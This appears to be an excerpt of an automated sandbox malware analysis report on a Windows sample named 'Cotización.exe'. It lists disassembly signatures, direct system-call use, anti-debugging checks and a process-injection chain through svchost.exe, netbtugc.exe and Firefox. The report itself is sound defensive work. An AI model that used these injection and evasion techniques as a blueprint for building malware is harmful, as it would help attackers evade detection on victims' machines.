            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov ecx, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A830 mov eax, dword ptr fs:[00000030h]2_2_0366A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D483A mov eax, dword ptr fs:[00000030h]2_2_036D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D483A mov eax, dword ptr fs:[00000030h]2_2_036D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC810 mov eax, dword ptr fs:[00000030h]2_2_036BC810
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 2084Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CC3008Jump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Cotizaci#U00f3n.exe"Jump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: Cotizaci#U00f3n.exe, UOIRaMZSIyDCj.exe, 00000003.00000002.3764081167.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000000.1430424108.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579595406.0000000001551000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UOIRaMZSIyDCj.exe, 00000003.00000002.3764081167.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000000.1430424108.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579595406.0000000001551000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: UOIRaMZSIyDCj.exe, 00000003.00000002.3764081167.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000000.1430424108.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579595406.0000000001551000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: Cotizaci#U00f3n.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: UOIRaMZSIyDCj.exe, 00000003.00000002.3764081167.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000000.1430424108.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579595406.0000000001551000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
